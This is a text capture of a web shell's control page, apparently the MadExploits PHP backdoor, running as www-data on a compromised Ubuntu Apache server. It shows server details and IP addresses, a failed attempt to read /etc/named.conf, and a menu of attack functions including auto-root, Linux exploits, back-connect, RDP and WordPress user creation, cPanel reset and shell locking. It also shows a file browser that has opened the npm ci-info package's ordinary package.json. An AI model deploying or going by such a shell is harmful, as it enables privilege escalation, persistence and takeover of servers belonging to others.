Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.71.203.111
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
node_modules /
ci-info /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
2.31
KB
-rw-r--r--
package.json
1023
B
-rw-r--r--
vendors.json
5.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "ci-info", "version": "3.8.0", "description": "Get details about the current Continuous Integration environment", "main": "index.js", "typings": "index.d.ts", "author": "Thomas Watson Steen <w@tson.dk> (https://twitter.com/wa7son)", "license": "MIT", "repository": "https://github.com/watson/ci-info.git", "bugs": "https://github.com/watson/ci-info/issues", "homepage": "https://github.com/watson/ci-info", "keywords": [ "ci", "continuous", "integration", "test", "detect" ], "files": [ "vendors.json", "index.js", "index.d.ts", "CHANGELOG.md" ], "funding": [ { "type": "github", "url": "https://github.com/sponsors/sibiraj-s" } ], "scripts": { "lint:fix": "standard --fix", "test": "standard && node test.js", "prepare": "husky install" }, "devDependencies": { "clear-module": "^4.1.2", "husky": "^8.0.2", "standard": "^17.0.0", "tape": "^5.6.1" }, "engines": { "node": ">=8" } }
Close